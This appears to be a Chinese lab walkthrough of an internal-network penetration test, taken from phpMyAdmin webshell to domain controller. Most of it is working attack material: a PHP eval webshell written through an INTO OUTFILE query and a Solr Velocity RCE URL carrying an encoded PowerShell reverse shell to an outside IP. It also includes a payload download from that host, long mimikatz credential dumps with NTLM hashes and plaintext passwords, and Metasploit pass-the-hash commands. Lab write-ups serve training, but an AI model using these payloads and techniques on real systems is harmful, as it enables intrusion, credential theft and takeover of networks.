记一次教学版内网渗透流程

信息收集

如果觉得文章写的不错可以共同交流
请添加图片描述

http://aertyxqdp1.target.yijinglab.com/

dirsearch

dirsearch -u "http://aertyxqdp1.target.yijinglab.com/"

发现

http://aertyxqdp1.target.yijinglab.com/joomla/http://aertyxqdp1.target.yijinglab.com/phpMyAdmin/http://aertyxqdp1.target.yijinglab.com/joomla/.git

漏洞探测

Githack获取源码

python GitHack.py http://aertyxqdp1.target.yijinglab.com/joomla/.git获取到源码public $user = 'root';
public $password = 'yijing666mingyyiyeryi666';public $log_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\administrator/logs';
public $tmp_path = 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla/tmp';

0

1

0

漏洞利用

登录phpmyadmin,写webshell

show global variables like "secure%";select '<?php eval($_POST["pwd"]); ?>' into outfile 'C:\\phpStudy\\PHPTutorial\\WWW\\Joomla\\shelld41d8cd98f00b204.php';

2

查看权限

3

写webshell

4

链接

5

6

信息收集

Windows IP 配置
以太网适配器 本地连接:连接特定的 DNS 后缀 . . . . . . . : openstacklocal本地链接 IPv6 地址. . . . . . . . : fe80::4d4:61aa:24be:fb73%11IPv4 地址 . . . . . . . . . . . . : 172.16.36.63子网掩码  . . . . . . . . . . . . : 255.255.255.0默认网关. . . . . . . . . . . . . : 172.16.36.254
隧道适配器 isatap.openstacklocal:媒体状态  . . . . . . . . . . . . : 媒体已断开连接特定的 DNS 后缀 . . . . . . . : openstacklocal

7

8

whoami

9

net time /domain

不在域内

hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:329153f560eb329c0e1deea55e88a1e9:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::administrator
root

内网转发

fscan简单扫扫

10

11

上传代理

http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php

12

python neoreg.py -u http://aertyxqdp1.target.yijinglab.com/Joomla/ttd41d8cd98f00b204.php -k 123456789

13

14

solr站点

15

看core

16

17

内网渗透

命令执行

http://172.16.36.133:8983/solr/test/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27powershell.exe%20-e%20JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAOAAyAC4AMQA1ADcALgAxADcAMwAuADEAMQAyACIALAA1ADAANQA2ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end

在82.157.173.112服务器上

nc -lvnp 5056

反弹成功

18

同层2个机器

172.16.36.63
172.16.36.133 (双网卡)

在172.16.36.133信息收集发现172.16段

19

下msf马

$p = new-object system.net.webclient
$p.downloadfile("http://82.157.173.112:8081/shell.exe","shell.exe")

反弹

20

21

80机器(在域内)

net time /domain

22

传fscan

扫描172.16.16.0/24

f.exe -h 172.16.16.0/24 -o r16.txt___                              _    / _ \     ___  ___ _ __ __ _  ___| | __ / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <    
\____/     |___/\___|_|  \__,_|\___|_|\_\   fscan version: 1.8.2
start infoscan
(icmp) Target 172.16.16.1     is alive
(icmp) Target 172.16.16.33    is alive
(icmp) Target 172.16.16.80    is alive
(icmp) Target 172.16.16.189   is alive
[*] Icmp alive hosts len is: 4
172.16.16.80:139 open
172.16.16.189:445 open
172.16.16.33:445 open
172.16.16.80:445 open
172.16.16.189:139 open
172.16.16.33:139 open
172.16.16.189:135 open
172.16.16.80:21 open
172.16.16.189:88 open
172.16.16.80:80 open
172.16.16.33:135 open
172.16.16.80:135 open
172.16.16.80:8983 open
[*] alive ports len is: 13
start vulscan
[*] NetInfo:
[*]172.16.16.189[->]WIN-MVNE1SFJ0LQ[->]172.16.16.189
[*] WebTitle: http://172.16.16.80       code:200 len:689    title:IIS7
[+] 172.16.16.80        MS17-010        (Windows 7 Professional 7601 Service Pack 1)
[+] 172.16.16.189       MS17-010        (Windows Server 2012 R2 Standard 9600)
[*] NetInfo:
[*]172.16.16.33[->]WIN-T02F2T5601J[->]172.16.16.33
[*] NetBios: 172.16.16.33    WIN-T02F2T5601J.dog.local           Windows Server 2016 Standard 14393 
[*] WebTitle: http://172.16.16.80:8983  code:302 len:0      title:None 跳转url: http://172.16.16.80:8983/solr/
[*] WebTitle: http://172.16.16.80:8983/solr/ code:200 len:14887  title:Solr Admin
[+] http://172.16.16.80:8983 poc-yaml-solr-velocity-template-rce 
已完成 13/13
[*] 扫描结束,耗时: 18.0771485s

23

综上

172.16.16.189 是域控域名是dog.local

net view /domain:dog

24

域内还有有172.16.16.33这个机器

在80机器上加载kiwi

kiwi_cmd sekurlsa::logonpasswords

Authentication Id : 0 ; 1190960344 (00000000:46fc9cd8)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:09:46
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 1186680366 (00000000:46bb4e2e)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:08:00
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : cf28dfb90f2faa3f856b4f2fa1d55fe9tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG* Password : (null)ssp :credman :Authentication Id : 0 ; 1177681477 (00000000:4631fe45)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:04:07
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 1169604964 (00000000:45b6c164)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/12 0:00:36
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 20558839 (00000000:0139b3f7)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:00:15
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : SOLR* NTLM     : 161cff084477fe596a5db81874498a24tspkg :* Username : Administrator* Domain   : SOLR* Password : (null)wdigest :* Username : Administrator* Domain   : SOLR* Password : (null)kerberos :* Username : Administrator* Domain   : SOLR* Password : (null)ssp :credman :Authentication Id : 0 ; 20364385 (00000000:0136bc61)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:57:41
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : SOLR* NTLM     : 161cff084477fe596a5db81874498a24tspkg :* Username : Administrator* Domain   : SOLR* Password : (null)wdigest :* Username : Administrator* Domain   : SOLR* Password : (null)kerberos :* Username : Administrator* Domain   : SOLR* Password : (null)ssp :credman :Authentication Id : 0 ; 12666668 (00000000:00c1472c)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:35:42
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 12437392 (00000000:00bdc790)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:31:28
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG* Password : (null)ssp :credman :Authentication Id : 0 ; 10819842 (00000000:00a51902)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 10:14:05
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :* Username : Administrator* Domain   : DOG* Password : (null)wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 9333731 (00000000:008e6be3)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:50:00
SID               : S-1-5-18msv :[00000003] Primary* Username : administrator* Domain   : WIN-T02F2T5601J* LM       : f67ce55ac831223dc187b8085fe1d9df* NTLM     : 161cff084477fe596a5db81874498a24* SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039dtspkg :* Username : administrator* Domain   : WIN-T02F2T5601J* Password : 1qaz@WSXwdigest :* Username : administrator* Domain   : WIN-T02F2T5601J* Password : 1qaz@WSXkerberos :* Username : administrator* Domain   : WIN-T02F2T5601J* Password : 1qaz@WSXssp :credman :Authentication Id : 0 ; 7246833 (00000000:006e93f1)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:36:41
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : SOLR* LM       : f67ce55ac831223dc187b8085fe1d9df* NTLM     : 161cff084477fe596a5db81874498a24* SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039dtspkg :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXwdigest :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXkerberos :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXssp :credman :Authentication Id : 0 ; 6122549 (00000000:005d6c35)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:20:48
SID               : S-1-5-18msv :[00000003] Primary* Username : administrator* Domain   : SOLR* LM       : f67ce55ac831223dc187b8085fe1d9df* NTLM     : 161cff084477fe596a5db81874498a24* SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039dtspkg :* Username : administrator* Domain   : SOLR* Password : 1qaz@WSXwdigest :* Username : administrator* Domain   : SOLR* Password : 1qaz@WSXkerberos :* Username : administrator* Domain   : SOLR* Password : 1qaz@WSXssp :credman :Authentication Id : 0 ; 342819 (00000000:00053b23)
Session           : Service from 0
User Name         : DefaultAppPool
Domain            : IIS APPPOOL
Logon Server      : (null)
Logon Time        : 2024/4/11 7:47:09
SID               : S-1-5-82-3006700770-424185619-1745488364-794895919-4004696415msv :[00000003] Primary* Username : SOLR$* Domain   : DOG* NTLM     : fe1b9cb384f267f3bf2bb9192d927910* SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7ftspkg :* Username : SOLR$* Domain   : DOG* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5wdigest :* Username : SOLR$* Domain   : DOG* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5kerberos :* Username : SOLR$* Domain   : dog.local* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5ssp :credman :Authentication Id : 0 ; 136069 (00000000:00021385)
Session           : Interactive from 1
User Name         : Administrator
Domain            : SOLR
Logon Server      : SOLR
Logon Time        : 2024/4/11 7:45:17
SID               : S-1-5-21-2356296415-3603686952-1554484469-500msv :[00000003] Primary* Username : Administrator* Domain   : SOLR* LM       : f67ce55ac831223dc187b8085fe1d9df* NTLM     : 161cff084477fe596a5db81874498a24* SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039dtspkg :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXwdigest :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXkerberos :* Username : Administrator* Domain   : SOLR* Password : 1qaz@WSXssp :[00000000]* Username : administrator* Domain   : (null)* Password : 1qaz@WSXcredman :Authentication Id : 0 ; 995 (00000000:000003e3)
Session           : Service from 0
User Name         : IUSR
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:45:06
SID               : S-1-5-17msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :ssp :credman :Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :* Username : (null)* Domain   : (null)* Password : (null)ssp :credman :Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:45
SID               : S-1-5-20msv :[00000003] Primary* Username : SOLR$* Domain   : DOG* NTLM     : fe1b9cb384f267f3bf2bb9192d927910* SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7ftspkg :wdigest :* Username : SOLR$* Domain   : DOG* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5kerberos :* Username : solr$* Domain   : DOG.LOCAL* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5ssp :credman :Authentication Id : 0 ; 33980 (00000000:000084bc)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:42
SID               : msv :[00000003] Primary* Username : SOLR$* Domain   : DOG* NTLM     : fe1b9cb384f267f3bf2bb9192d927910* SHA1     : 09b44a82a5fe2e4859fdbc668e70b8ba63fd7e7ftspkg :wdigest :kerberos :ssp :credman :Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SOLR$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 7:44:41
SID               : S-1-5-18msv :tspkg :wdigest :* Username : SOLR$* Domain   : DOG* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5kerberos :* Username : solr$* Domain   : DOG.LOCAL* Password : GwNE=vN#HQ/J7Fv=1htg:EW1x<99-b I`eC8!%4M0I0/7eLmgD6iRj>]amJ\p>j&8*Xu("v"^o5g;h(Qj]mI3FD<]b2>K(.5J8/+r'am*95#kr\:voomU#^5ssp :credman :

其他获取的密码

25

攻击内网主机

哈希传递打33机器

use windows/smb/ms17_010_psexecset smbuser administratorset SMBDomain dog.localset SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

成功反弹

26

27

28

切换下路由哈希传递打189

use  exploit/windows/smb/psexecset SMBUser administratorset SMBPass aad3b435b51404eeaad3b435b51404ee:e054e61488f2545292d4e5b9f722d9a2

29

读取189密码

30

ipconfig

31

33的密码

Authentication Id : 0 ; 243527 (00000000:0003b747)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN-T02F2T5601J
Logon Server      : WIN-T02F2T5601J
Logon Time        : 2024/4/11 9:01:45
SID               : S-1-5-21-1188958703-4046475421-80252671-500msv :[00000003] Primary* Username : Administrator* Domain   : WIN-T02F2T5601J* NTLM     : 161cff084477fe596a5db81874498a24* SHA1     : d669f3bccf14bf77d64667ec65aae32d2d10039dtspkg :wdigest :* Username : Administrator* Domain   : WIN-T02F2T5601J* Password : (null)kerberos :* Username : Administrator* Domain   : WIN-T02F2T5601J* Password : (null)ssp :credman :Authentication Id : 0 ; 40882 (00000000:00009fb2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:53
SID               : S-1-5-90-0-1msv :[00000003] Primary* Username : WIN-T02F2T5601J$* Domain   : DOG* NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742* SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939btspkg :wdigest :* Username : WIN-T02F2T5601J$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-T02F2T5601J$* Domain   : dog.local* Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*ssp :credman :Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:51
SID               : S-1-5-20msv :[00000003] Primary* Username : WIN-T02F2T5601J$* Domain   : DOG* NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742* SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939btspkg :wdigest :* Username : WIN-T02F2T5601J$* Domain   : DOG* Password : (null)kerberos :* Username : win-t02f2t5601j$* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 21095 (00000000:00005267)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : msv :[00000003] Primary* Username : WIN-T02F2T5601J$* Domain   : DOG* NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742* SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939btspkg :wdigest :kerberos :ssp :credman :Authentication Id : 0 ; 2678848 (00000000:0028e040)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:07:39
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG* Password : (null)ssp :credman :Authentication Id : 0 ; 2641030 (00000000:00284c86)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 13:01:37
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : WIN-T02F2T5601J* NTLM     : 161cff084477fe596a5db81874498a24tspkg :wdigest :* Username : Administrator* Domain   : WIN-T02F2T5601J* Password : (null)kerberos :* Username : Administrator* Domain   : WIN-T02F2T5601J* Password : (null)ssp :credman :Authentication Id : 0 ; 2617925 (00000000:0027f245)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 12:59:03
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : SOLR* NTLM     : 161cff084477fe596a5db81874498a24tspkg :wdigest :* Username : Administrator* Domain   : SOLR* Password : (null)kerberos :* Username : Administrator* Domain   : SOLR* Password : (null)ssp :credman :Authentication Id : 0 ; 1758011 (00000000:001ad33b)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:56:43
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG* Password : (null)ssp :credman :Authentication Id : 0 ; 1550764 (00000000:0017a9ac)
Session           : NewCredentials from 0
User Name         : SYSTEM
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 9:54:13
SID               : S-1-5-18msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2tspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : Administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 504399 (00000000:0007b24f)
Session           : Interactive from 2
User Name         : administrator
Domain            : DOG
Logon Server      : WIN-MVNE1SFJ0LQ
Logon Time        : 2024/4/11 9:11:41
SID               : S-1-5-21-2515766443-2959740750-3575737072-500msv :[00000003] Primary* Username : Administrator* Domain   : DOG* NTLM     : e054e61488f2545292d4e5b9f722d9a2* SHA1     : 6aec174b0d46521c233a254120538a6bddecc0c7* DPAPI    : cf28dfb90f2faa3f856b4f2fa1d55fe9tspkg :wdigest :* Username : Administrator* Domain   : DOG* Password : (null)kerberos :* Username : administrator* Domain   : DOG.LOCAL* Password : (null)ssp :credman :Authentication Id : 0 ; 488613 (00000000:000774a5)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 9:10:45
SID               : S-1-5-90-0-2msv :[00000003] Primary* Username : WIN-T02F2T5601J$* Domain   : DOG* NTLM     : 1b45f9595e69e9c3b6c4638a9eb93742* SHA1     : 7441ee1a7c411a0270eed7e6795486d2a4c5939btspkg :wdigest :* Username : WIN-T02F2T5601J$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-T02F2T5601J$* Domain   : dog.local* Password : 6ivL>l5L4k%2OFgmyC*d9R.@v),mOXR^4:xGSteG#;P^n&48N""C4Y=>9C0K&P+%/x9B+0%#k=nXHl8ho(7Qq`:Ovt"iOBq1zy `7C$ wO`Nv-z=&'P"haR*ssp :credman :Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:54
SID               : S-1-5-19msv :tspkg :wdigest :* Username : (null)* Domain   : (null)* Password : (null)kerberos :* Username : (null)* Domain   : (null)* Password : (null)ssp :credman :Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN-T02F2T5601J$
Domain            : DOG
Logon Server      : (null)
Logon Time        : 2024/4/11 8:57:48
SID               : S-1-5-18msv :tspkg :wdigest :* Username : WIN-T02F2T5601J$* Domain   : DOG* Password : (null)kerberos :* Username : win-t02f2t5601j$* Domain   : DOG.LOCAL* Password : (null)ssp :credman :

189的密码

kiwi_cmd sekurlsa::logonpasswordsAuthentication Id : 0 ; 40540132 (00000000:026a97e4)
Session           : Interactive from 2
User Name         : DWM-2
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/11 11:49:36
SID               : S-1-5-90-2msv :[00000003] Primary* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* NTLM     : 94901a951ee2d32e070982b4276eebd6* SHA1     : e5cb7373614ebcf623c1d23f74e8fe909ef3fbb3tspkg :wdigest :* Username : WIN-MVNE1SFJ0LQ$* Domain   : DOG* Password : (null)kerberos :* Username : WIN-MVNE1SFJ0LQ$* Domain   : dog.local* Password : 3d a8 bc 4c cd ed 97 02 2b 9c b1 14 85 2a 37 05 22 a2 b9 07 3a 88 4e 4e 42 60 45 c2 6c 18 f1 36 1d 58 dd 69 e6 9c f5 e8 2f 4a 07 0e b2 3b 58 07 46 4d 6a 0e e3 48 10 54 ce eb 2c 77 5e 51 e1 8f e5 1a 63 8b b7 2c cb f5 08 46 2a 03 27 99 13 66 7c 7d 9b ed 48 36 0d 42 89 43 56 14 c7 b1 44 dc d0 82 ce ae 59 64 ac 8d 16 82 07 da 18 e5 1e cd e7 1c f8 b1 bb b8 65 7a d7 91 3e 59 8b 9b 0b 45 bd 30 b0 90 48 e0 e6 31 e1 85 1d 70 eb 16 0a f7 b2 dd 13 2c fc 3d d7 0a f7 70 43 13 04 4b 79 0d 44 60 28 13 dd cb 3e ae 89 9c f1 42 fb 11 54 65 9a be 2a 10 82 57 e9 d9 a8 ef 4d 2a e9 85 01 36 f8 3d 8d 66 9b 6b 58 ef 86 54 34 2b 9e 6c e9 4d c0 a7 ec 85 e7 b1 4e 54 91 af e6 d4 d9 8e 08 e9 78 ff f9 d0 45 b2 b7 14 40 2c 8a a9 a9 62 21 d2 ssp :   KOcredman :Authentication Id : 0 ; 55884 (00000000:0000da4c)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 2024/4/3 7:15:12
